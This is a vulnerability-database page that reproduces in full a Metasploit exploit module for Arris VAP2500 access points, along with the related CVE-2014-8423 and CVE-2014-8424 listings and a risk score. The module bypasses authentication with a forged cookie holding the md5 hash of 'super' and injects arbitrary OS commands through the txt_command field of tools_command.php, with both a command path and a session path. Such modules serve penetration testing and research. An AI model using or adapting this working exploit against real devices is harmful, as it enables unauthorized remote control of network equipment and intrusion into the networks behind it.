Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Arris VAP2500 Command Execution Exploit

🗓️ 22 Jan 2015 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 93 Views

Arris VAP2500 tools_command.php Command Execution - OS command injection in web management portal. Authentication bypass via cookie.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		ARRIS VAP2500 Management Portal Remote Command Execution Vulnerability
30 Nov 201400:00
zdt
0day.today		ARRIS VAP2500 Management Portal Authentication Bypass Vulnerability
30 Nov 201400:00
zdt
CVE		CVE-2014-8423
28 Nov 201415:00
cve
CVE		CVE-2014-8424
28 Nov 201415:00
cve
Cvelist		CVE-2014-8423
28 Nov 201415:00
cvelist
Cvelist		CVE-2014-8424
28 Nov 201415:00
cvelist
Metasploit		Arris VAP2500 tools_command.php Command Execution
2 Dec 201405:07
metasploit
NVD		CVE-2014-8423
28 Nov 201415:59
nvd
NVD		CVE-2014-8424
28 Nov 201415:59
nvd
Packet Storm		Arris VAP2500 tools_command.php Command Execution
22 Jan 201500:00
packetstorm
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Arris VAP2500 tools_command.php Command Execution',
      'Description' => %q{
        Arris VAP2500 access points are vulnerable to OS command injection in the web management
        portal via the tools_command.php page. Though authentication is required to access this
        page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid
        username.
      },
      'Author'      =>
        [
          'HeadlessZeke' # Vulnerability discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-8423'],
          ['CVE', '2014-8424'],
          ['OSVDB', '115045'],
          ['OSVDB', '115046'],
          ['BID', '71297'],
          ['BID', '71299'],
          ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']
        ],
      'DisclosureDate' => 'Nov 25 2014',
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet'
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget' => 0
      ))
  end

  def check
    begin
      res = send_request_raw({
        'method' => 'GET',
        'uri' => '/tools_command.php',
        'cookie' => "p=#{Rex::Text.md5('super')}"
      })
      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Trying to access the device ...")

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("#{peer} - Exploiting...")

    if datastore['PAYLOAD'] == 'cmd/unix/generic'
      exploit_cmd
    else
      exploit_session
    end
  end

  def exploit_cmd
    beg_boundary = rand_text_alpha(8)
    end_boundary = rand_text_alpha(8)

    begin
      res = send_request_cgi({
        'uri'    => normalize_uri('/', 'tools_command.php'),
        'vars_post' => {
          'cmb_header'  => '',
          'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
        },
        'method' => 'POST',
        'cookie' => "p=#{Rex::Text.md5('super')}"
      })

      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
        print_good("#{peer} - Command sent successfully")
        if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m
          print_status("#{peer} - Command output: #{$1}")
        end
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def exploit_session
    begin
      send_request_cgi({
        'uri'    => normalize_uri('/', 'tools_command.php'),
        'vars_post' => {
         'cmb_header'  => '',
         'txt_command' => "#{payload.encoded}"
        },
        'method' => 'POST',
        'cookie' => "p=#{Rex::Text.md5('super')}"
      }, 3)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

#  0day.today [2018-04-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jan 2015 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.53544
arrisvap2500command injectionweb managementauthentication bypasscookieos commandvulnerabilitymetasploitcveosvdbbidurlexploitunix
93